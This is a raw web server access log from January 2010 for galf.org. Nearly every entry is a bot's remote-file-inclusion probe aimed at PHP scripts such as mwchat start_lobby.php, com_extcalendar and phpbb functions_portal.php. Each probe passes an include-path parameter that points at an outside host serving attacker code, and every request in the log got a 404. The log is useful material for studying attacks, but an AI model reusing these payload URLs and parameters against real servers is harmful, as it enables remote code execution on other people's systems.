71.250.232.26 - - [04/Jan/2010:05:03:44 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [04/Jan/2010:05:03:45 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [04/Jan/2010:05:03:45 -0800] "GET /logs/access_091228.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [04/Jan/2010:05:04:11 -0800] "GET /logs/access_091228.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:08:49 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:08:53 -0800] "GET /logs/access_091228.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:08:53 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:08:53 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:09:00 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:09:00 -0800] "GET /logs/access_091228.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:09:17 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:09:23 -0800] "GET /logs/access_091228.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:09:23 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [04/Jan/2010:05:09:52 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [04/Jan/2010:05:10:11 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [04/Jan/2010:05:10:11 -0800] "GET /logs/access_091228.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:10:29 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:05:10:29 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:05:10:29 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:05:13:14 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:05:13:14 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:05:13:14 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:05:13:14 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:05:13:14 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:05:13:14 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.62.35.55 - - [04/Jan/2010:05:13:39 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:05:13:40 -0800] "GET /logs/access_090706.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:05:13:40 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:05:13:47 -0800] "GET /logs/access_090629.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:05:14:26 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:05:14:26 -0800] "GET /logs/access_090706.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:05:14:27 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:05:14:35 -0800] "GET /logs/access_090629.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:05:16:18 -0800] "GET /logs/access_090713.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:05:16:53 -0800] "GET /logs/access_090831.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [04/Jan/2010:05:18:53 -0800] "GET /logs/access_091221.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:05:20:21 -0800] "GET /logs/access_090713.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:05:20:56 -0800] "GET /logs/access_090831.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [04/Jan/2010:05:22:02 -0800] "GET /logs/access_091228.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:05:24:21 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:05:24:21 -0800] "GET /logs/access_091221.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:05:24:21 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
69.175.58.130 - - [04/Jan/2010:05:25:10 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ottoebeyer.com/tools/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.58.130 - - [04/Jan/2010:05:25:10 -0800] "GET /logs/access_091012.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ottoebeyer.com/tools/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.58.130 - - [04/Jan/2010:05:25:10 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ottoebeyer.com/tools/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.58.130 - - [04/Jan/2010:05:26:02 -0800] "GET /logs/access_091012.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ottoebeyer.com/tools/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.58.130 - - [04/Jan/2010:05:26:02 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ottoebeyer.com/tools/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.58.130 - - [04/Jan/2010:05:26:02 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ottoebeyer.com/tools/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:26:15 -0800] "GET /logs/access_091228.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:26:15 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:26:15 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:26:28 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:26:28 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:26:28 -0800] "GET /logs/access_091228.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:26:38 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:26:38 -0800] "GET /logs/access_091228.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:26:38 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:27:24 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:05:27:24 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:05:27:24 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.151.247.1 - - [04/Jan/2010:05:29:02 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.151.247.1 - - [04/Jan/2010:05:29:02 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:29:46 -0800] "GET /logs/access_091228.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:31:00 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:05:31:00 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:05:31:00 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:05:31:01 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:05:31:01 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:05:31:01 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:05:33:41 -0800] "GET /logs/access_091228.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:33:47 -0800] "GET /logs/access_091228.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:34:33 -0800] "GET /includes/functions_portal.php?phpbb_root_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:34:33 -0800] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:34:33 -0800] "GET /logs/access_091116.log%20%20//includes/functions_portal.php?phpbb_root_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:34:34 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:05:34:36 -0800] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:34:36 -0800] "GET /includes/functions_portal.php?phpbb_root_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:34:36 -0800] "GET /logs/access_091116.log%20%20//includes/functions_portal.php?phpbb_root_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:34:46 -0800] "GET /includes/functions_portal.php?phpbb_root_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:34:46 -0800] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:34:46 -0800] "GET /logs/access_091116.log%20%20//includes/functions_portal.php?phpbb_root_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:05:35:00 -0800] "GET /includes/functions_portal.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:05:35:00 -0800] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:05:35:00 -0800] "GET /logs/access_091116.log%20%20//includes/functions_portal.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:05:35:00 -0800] "GET /includes/functions_portal.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:05:35:00 -0800] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:05:35:00 -0800] "GET /logs/access_091116.log%20%20//includes/functions_portal.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:05:35:02 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:05:35:02 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:05:35:02 -0800] "GET /logs/access_090824.log%20%20//admin/business_inc/saveserver.php?thisdir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:05:35:09 -0800] "GET /logs/access_090907.log%20%20//admin/business_inc/saveserver.php?thisdir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:05:35:27 -0800] "GET /errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:05:35:27 -0800] "GET /logs/access.log%20%20//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:05:35:27 -0800] "GET /logs//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:05:35:58 -0800] "GET /logs/access_091228.log%20%20//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:05:36:03 -0800] "GET /logs/access_090824.log%20%20//includes/functions_portal.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:05:36:42 -0800] "GET /logs/access_091228.log//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:05:36:42 -0800] "GET /errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:05:36:46 -0800] "GET /logs//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:05:36:46 -0800] "GET /errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:05:36:46 -0800] "GET /logs/access.log%20%20//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:05:36:47 -0800] "GET /includes/functions_portal.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:05:36:47 -0800] "GET /logs/access_091116.log//includes/functions_portal.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:05:36:47 -0800] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:05:36:48 -0800] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:05:36:48 -0800] "GET /logs/access_091116.log//includes/functions_portal.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:05:36:48 -0800] "GET /includes/functions_portal.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:36:56 -0800] "GET /logs/access_090824.log%20%20//includes/functions_portal.php?phpbb_root_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:05:36:58 -0800] "GET /logs/access_091228.log//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:05:36:58 -0800] "GET /errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:05:36:58 -0800] "GET /logs//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:05:37:10 -0800] "GET /logs/access_090824.log%20%20//includes/functions_portal.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:05:37:13 -0800] "GET /logs/access_091228.log%20%20//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:37:34 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:05:37:36 -0800] "GET /logs/access_090824.log%20%20//includes/functions_portal.php?phpbb_root_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:37:43 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
